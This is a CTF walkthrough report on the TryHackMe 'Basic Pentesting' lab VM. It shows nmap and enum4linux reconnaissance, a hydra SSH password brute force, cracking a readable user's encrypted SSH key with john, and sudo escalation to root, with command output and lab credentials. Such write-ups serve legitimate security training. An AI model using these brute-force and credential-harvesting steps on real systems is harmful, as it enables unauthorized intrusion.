

TryHackMe CTF

The Basic Pentesting



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Abstract

"Basic pentesting", a popular TryHackMe Catch The Flag (CTF) challenge, is designed to help newcomers to penetration testing develop pentesting skills and have fun to explore part of the offensive side of security.

The goal is to remotely attack a Virtual Machine (VM), gain root privileges, and read the flag located at /root/flag.txt. This report will provide a walkthrough of the steps to complete this CTF challenge.

Disclaimer: This report is provided for educational and informational purpose only (Penetration Testing). Penetration Testing refers to legal intrusion tests that aim to identify vulnerabilities and improve cybersecurity, rather than for malicious purposes.





Scanning

Prerequisites:

• Attacker: Kali Linux

• **Victim:** VM (192.168.1.139)

So, let's begin by first scanning the ports open by using the most popular scanning tool called nmap.

nmap -A 192.168.1.139

```
ali:~# nmap -A 192.168.1.139 💠
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-14 04:24 EDT
Whap scan report for 192.168.1.139
Host is up (0.0044s latency).
Not shown: 994 closed ports
         STATE SERVICE
PORT
                           VERSION
22/tcp
               ssh
                           OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; pr
 ssh-hostkey
    2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
    256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
    256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
30/tcp
         open http
                           Apache httpd 2.4.18 ((Ubuntu))
 http-server-header: Apache/2.4.18 (Ubuntu)
 http-title: Site doesn't have a title (text/html).
39/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
              netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
445/tcp open
                           Apache Jserv (Protocol v1.3)
3009/tcp open
               ajp13
 ajp-methods:
   Supported methods: GET HEAD POST OPTIONS
8080/tcp open http
                           Apache Tomcat 9.0.7
 http-favicon: Apache Tomcat
 http-title: Apache Tomcat/9.0.7
MAC Address: 08:00:27:A1:01:12 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux kernel
```

Here, we can see that port 22 is open. But we don't have any users currently.



Enumeration

Let's use **enum4linux** and try to find the users available.

enum4linux 192.168.139

```
ali:~# enum4linux 192.168.1.139 💠
tarting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux
    Target Information
arget ....... 192.168.1.139
                  500-550,1000-1050
assword
inown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    Enumerating Workgroup/Domain on 192.168.1.139
+] Got domain/workgroup name: WORKGROUP
   Nbtstat Information for 192.168.1.139
ooking up status of 192.168.1.139
                       <00> -___
       BASIC2
                                      B <ACTIVE>
                                                  Workstation Service
       BASIC2
                       <03> -
                                      B <ACTIVE>
                                                  Messenger Service
                       <20> -
                                      B <ACTIVE>
                                                  File Server Service
       BASIC2
          _MSBR0WSE
                       <01> - <GROUP> B <ACTIVE>
                                                  Master Browser
                       <00> - <GROUP> B <ACTIVE>
                                                   Domain/Workgroup Name
       WORKGROUP
       WORKGROUP
                       <1d> -
                                      B <ACTIVE>
                                                   Master Browser
       WORKGROUP
                       <1e> - <GROUP> B <ACTIVE>
                                                   Browser Service Elections
```

Here, we have found 2 users **jan** and **kay** with us.

```
S-1-5-21-2853212168-2008227510-3551253869-1046 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1047 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1048 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\kay (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
```



Let's try brute-force for the user jan using hydra tool which comes pre-installed in kali. We will be using the dictionary "**rockyou.txt**" to brute force the login of jan.

hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.1.139 ssh

```
-l jan -P /usr/share/wordlists/rockyou.txt 192.168.1.139
 dra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or
 ydra (http://www.thc.org/thc-hydra) starting at 2018-07-14 04:28:56
WARNING] Many SSH configurations limit the number of parallel tasks,
DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:143
DATA] attacking ssh://192.168.1.139:22/
STATUS] 258.00 tries/min, 258 tries in 00:01h, 14344143 to do in 926:38h, 16 active
STATUS] 246.33 tries/min, 739 tries in 00:03h, 14343663 to do in 970:29h, 16 active
[22][ssh] host: 192.168.1.139
                                                  password: armando
                                    login: jan
 of 1 target successfully completed, 1 valid password found
 dra (http://www.thc.org/thc-hydra) finished at 2018-07-14 04:32:20
```

Amazing! We have found the login details of jan!

Username: jan

Password: armando

Now, let's try and ssh login using the details we just cracked.





```
root@kali:~# ssh jan@192.168.1.139 <
The authenticity of host '192.168.1.139 (192.168.1.139)' can't be established
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn40PL7GN/DuVHVv00lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.139' (ECDSA) to the list of known hosts
jan@192.168.1.139's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86 64)
 * Documentation: https://help.ubuntu.com
 * Management:
                      https://landscape.canonical.com
                      https://ubuntu.com/advantage
 * Support:
92 packages can be updated.
51 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
```

Wow! We have successfully gained a shell here. But jan don't have sudo rights. Let's check for any other users and the files and folders in it.

cd /home

We found another folder called **kay.** Let's go inside it and run **ls -la** command.

cd kay ls -la cd .ssh ls -al



```
jan@basic2:/$ cd /home 👍
jan@basic2:/home$ ls
jan
    kay
jan@basic2:/home$ cd kay 🔷
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay
                       4096 Apr 23 15:38
                  kay
drwxr-xr-x 4 root root 4096 Apr 19 13:50
rw----- 1 kay
                        756 Apr 23 16:06 .bash history
                  kay
rw-r--r-- 1 kay
                  kay
                        220 Apr 17 12:59 .bash logout
rw-r--r-- 1 kay
                       3771 Apr 17 12:59
                  kay
                                         .bashrc
drwx----- 2 kay
                  kay
                               17 13:05
                                         .cache
rw----- 1 root kay
                        119 Apr 23 15:38 .lesshst
drwxrwxr-x 2 kay
                       4096 Apr 23 14:50 .nano
                  kay
                                23 15:08 pass.bak
rw----- 1 kay
                  kay
rw-r--r-- 1 kay
                        655 Apr 17 12:59 .profile
                  kay
drwxr-xr-x 2 kay
                  kay
                       4096 Apr 23 15:05 .ssh
                          0 Apr 17 13:05 .sudo as admin successful
∙rw-r--r-- 1 kay
rw----- 1 root kay
                        538 Apr 23 15:32 .viminfo
an@basic2:/home/kay$ cd .ssh 💠
jan@basic2:/home/kay/.ssh$ ls -la 🗢
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 15:05 .
drwxr-xr-x 5 kay kay 4096 Apr 23 15:38
∙rw-rw-r-- 1 kay kay
                      771 Apr 23 15:05 authorized_keys
rw-r--r-- 1 kay kay 3326 Apr 19 13:41 id rsa
rw-r--r-- 1 kay kay
                      771 Apr 19 13:41 id_rsa.pub
an@basic2:/home/kay/.ssh$
```

Hmmm... this **id_rssa** file looks fishy. Let's read it using: **cat id_rsa** and copy paste it in the text file.





```
jan@basic2:/home/kay/.ssh$ cat id_rsa <= ----BEGIN RSA PRIVATE KEY-----</pre>
```

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

IoNb/J0g2Pd56EZ23oAaJxLvhuSZ1crRr40NGUAnKcRxg3+9vn6xcujpzUDuUtlZ o9dyIEJB4wUZTueBPsmb487RdFVkT0VQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN KRvjw/HRiGcXPY8B7nsAleiPYrPZHIH3Q0FIYlSPMYv79RC65i6frkDSvxXzbdfX AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU hWQJCdnb/U+dRasu3oxqyklKU2dPseU7rlvPAqa6y+ogK/woTbnTrkRngKqLQxMl lIWZye4yrLETfc275hzVVYh6FkLgt0faly0bMqGIrM+eWVoX0rZPBlv8iyNTDdDE 3jRjqb0GlPs01hAWKIRxUPaEr18lcZ+0lY00Vw2oNL2xKUgtQpV2jwH04yGdXbfJ .YWlXxnJJpVMhKC6a75pe4ZVxfmMt0QcK4oK01aRGMqLFNwaPxJYV6HauUoVExN7 bUpo+eLYVs5mo5tbpWDhi0NRfnGP1t6bn7Tvb77ACayGzHdLpIAqZmv/0hwRTnrb RVhY1CUf7xGNmbmzYHzNEwMppE2i8mFSaVFCJEC3cDgn5TvQUXfh6CJJRVrhdxVy /qVjsot+CzF7mbWm5nFsTPPlOnndC6JmrUEUjeIbLzBcW6bX5s+b95eFeceWMmVe B0WhqnPtDtVtg3sFdjxp0hgGXqK4bAMBnM4chFcK7RpvCRjsKyWYVEDJMYvc87Z0 ysv0pVn9WnF0Ud0N+U4pYP6PmNU4Zd2QekNIWYEXZIZMyypuGCFdA0SARf6/kKwG oHOACCK3ihAQKKbO+SflgXBaHXb6k0ocMQAWIOxYJunPKN8bzzlQLJs1JrZXibhl VaPeV7X25NaUyu5u4bqtFhb/f8aBKbel4XlWR+4HxbotpJx6RVByEPZ/kVi0q3S1 GpwHSRZon320xA4h0PkcG66JDyHlS6B328uViI6Da6frYi0nA4TEjJTP05RpcSEK QKIg65gICbpcWj1U4I9mEHZeHc0r2lyufZbnfYUr0qCVo8+mS8X75seeoNz8auQL 4DI4IXITq5saCHP4y/ntmz1A3Q0FNjZXAqdFK/hTAdhMQ5diGXnNw3tbmD8wGveG VfNSaExXeZA39j0gm3VboN6cAXpz124Kj0bEwzxCBzWKi0CPHFLYuMoDeLqP/NIk oSXloJc8aZemIl5RAH5gDCLT4k67wei9j/JQ6zLUT0vSmLono1IiFdsM04nUnyJ3 z+3XTDtZoUl5NiY4JjCPLhTNNjAlqnpcOaqad7gV3RD/asml2L2kB0UT8PrTtt+S baXKPFH0dHmownGmDatJP+eMrc6S896+HAXvcvPxlKNtI7+jsNTwuPBCNtSFvo19 l9+xxd55YTVo1Y8RMwjopzx7h8oRt7U+Y9N/BVtbt+XzmYLnu+3q0q4W2q0ynM2P nZjVPpeh+8DBoucB5bfXsiSkNxNYsCED4lspxUE4uMS3yXBpZ/44SyY8KEzrAzaI fn2nnjwQ1U2FaJwNtMN50IshONDEABf9Ilaq46LSGpMRahNNXwzozh+/LGFQmGjI

Now, we are going to use **ssh2john** to convert this SSH key into a crackable file for John the ripper.

```
python ssh2john key > ssh_login
john ssh_login
```

```
root@kali:~/Desktop# python ssh2john key > ssh_login
root@kali:~/Desktop# john ssh_login
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (key)
1g 0:00:44:37  3/3 0.000373g/s 867365p/s 867365c/s 867365C/s l86j14
Session aborted
```





Here, we found the phrase "beeswax." This could either be a password or any other phrase to unlock something as we move further.

Let's try and login to user **kay** using that key.

```
ssh -i key kay@192.168.1.139
```

It is asking for a passphrase now. Let's try and enter "beeswax"

```
@kali:~/Desktop# ssh
                           -i key kay@192.168.1.139 🗬
Enter passphrase for key 'key':
Velcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86 64)
 * Documentation:
                   https://help.ubuntu.com
                   https://landscape.canonical.com
   Management:
   Support:
                   https://ubuntu.com/advantage
92 packages can be updated.
51 updates are security updates.
Last login: Sat Jul 14 05:26:06 2018 from 192.168.1.103
kay@basic2:~$ ls -la 📥
total 48
drwxr-xr-x 5 kay
                  kay
                        4096 Apr 23 15:38
drwxr-xr-x 4 root root 4096 Apr 19 13:50
             kay
                  kay
                                   16:06 .bash history
 rw-r--r-- 1 kay
                  kay
                         220 Apr 17 12:59 .bash logout
 rw-r--r-- 1 kay
                  kay
                        3771 Apr 17 12:59 .bashrc

    2 kay

                   kay
                                    13:05 .cache
 rw------ 1 root
                  kay
                         119 Apr
                                 23 15:38
                                          .lesshst
                                    14:50 .nano
drwxrwxr-x 2 kay
                   kay
                                    15:08
             kay
                                 23
                                          pass.bak
 rw-r--r-- 1 kay
                                    12:59
                  kay
                         655
                                 17
                                          .profile
                                          .ssh
                                          .sudo as admin successful
                                    13:05
                  kay
                         538
                                 23 15:32
                                           .viminfo
           1 root
     areallystrongpasswordthatfollowsthepasswordpolicy$$
```

Voila!! We have successfully gained access to kay. Now let's try and read that pass.bak file. It looks like it could have something valuable!

```
cat pass.bak
```

It gives us the phrase "heresareallystrongpasswordthatfollowsthepasswordpolicy\$\$"

Credits to Hacking Articles



Privilege Escalation

Now Let's check sudo rights for him and write:

sudo -1

It surely asks for a root password. Let us type what we just got in pass.bak file. And you can observe kay has ALL permissions.

sudo su

Voila! It gives us root access. Let's check the /root directory by:

cd /root ls cat flag.txt

And we got a flag!

Hence, we were able to attain the flag in this challenge. Happy hacking!



Conclusion

Hence, one can make use of these commands as a cybersecurity professional to assess vulnerabilities on systems and keep these systems away from threat.

References

- https://www.hackingarticles.in/hack-the-basic-pentesting2-vm-ctf-challenge/
- https://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/
- https://tryhackme.com/room/basicpentesting